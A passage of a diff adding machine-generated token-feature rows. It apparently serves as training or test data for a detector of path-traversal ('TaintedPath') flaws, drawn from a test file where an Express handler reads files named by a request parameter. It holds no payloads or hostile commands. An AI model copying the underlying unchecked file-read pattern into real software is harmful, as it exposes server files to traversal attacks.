| autogenerated/TaintedPath/normalizedPaths.js:260:52:260:55 | path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:13 | relative | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:13 | relative | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:13 | relative | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:13 | relative | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:13 | relative | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:24 | relative.startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:24 | relative.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:24 | relative.startsWith | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:24 | relative.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:24 | relative.startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:47 | exceptional return of relativ ... le.sep) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:47 | exceptional return of relativ ... le.sep) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:47 | exceptional return of relativ ... le.sep) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:47 | exceptional return of relativ ... le.sep) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:47 | exceptional return of relativ ... le.sep) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:47 | relativ ... le.sep) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:47 | relativ ... le.sep) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:47 | relativ ... le.sep) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:47 | relativ ... le.sep) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:47 | relativ ... le.sep) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:67 | relativ ... == ".." | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:67 | relativ ... == ".." | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:67 | relativ ... == ".." | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:67 | relativ ... == ".." | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:261:6:261:67 | relativ ... == ".." | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:261:15:261:24 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:261:15:261:24 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:261:15:261:24 | startsWith | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:261:15:261:24 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:261:15:261:24 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:261:26:261:29 | ".." | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:261:26:261:29 | ".." | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:261:26:261:29 | ".." | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:261:26:261:29 | ".." | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:261:26:261:29 | ".." | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:261:26:261:29 | ".." | stringConcatenatedWith | -endpoint- pathModule.sep | | autogenerated/TaintedPath/normalizedPaths.js:261:26:261:46 | ".." + ... ule.sep | CalleeFlexibleAccessPath | relative.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:261:26:261:46 | ".." + ... ule.sep | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:261:26:261:46 | ".." + ... ule.sep | calleeImports | path | @@ -8988,6 +76400,62 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:261:26:261:46 | ".." + ... ule.sep | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:261:26:261:46 | ".." + ... ule.sep | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:261:26:261:46 | ".." + ... ule.sep | receiverName | relative | +| autogenerated/TaintedPath/normalizedPaths.js:261:33:261:42 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:261:33:261:42 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:261:33:261:42 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:261:33:261:42 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:261:33:261:42 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:261:33:261:46 | pathModule.sep | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:261:33:261:46 | pathModule.sep | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:261:33:261:46 | pathModule.sep | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:261:33:261:46 | pathModule.sep | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:261:33:261:46 | pathModule.sep | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:261:33:261:46 | pathModule.sep | stringConcatenatedWith | '..' -endpoint- | +| autogenerated/TaintedPath/normalizedPaths.js:261:44:261:46 | sep | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:261:44:261:46 | sep | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:261:44:261:46 | sep | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:261:44:261:46 | sep | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:261:44:261:46 | sep | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:261:52:261:59 | relative | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:261:52:261:59 | relative | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:261:52:261:59 | relative | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:261:52:261:59 | relative | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:261:52:261:59 | relative | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:261:52:261:67 | relative == ".." | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:261:52:261:67 | relative == ".." | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:261:52:261:67 | relative == ".." | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:261:52:261:67 | relative == ".." | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:261:52:261:67 | relative == ".." | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:261:64:261:67 | ".." | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:261:64:261:67 | ".." | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:261:64:261:67 | ".." | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:261:64:261:67 | ".." | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:261:64:261:67 | ".." | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:6 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:262:5:262:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:262:8:262:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:262:8:262:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:262:8:262:19 | readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:262:8:262:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:262:8:262:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:262:21:262:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:262:21:262:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:262:21:262:24 | path | calleeImports | fs | @@ -8997,6 +76465,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:262:21:262:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:262:21:262:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:262:21:262:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:6 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize 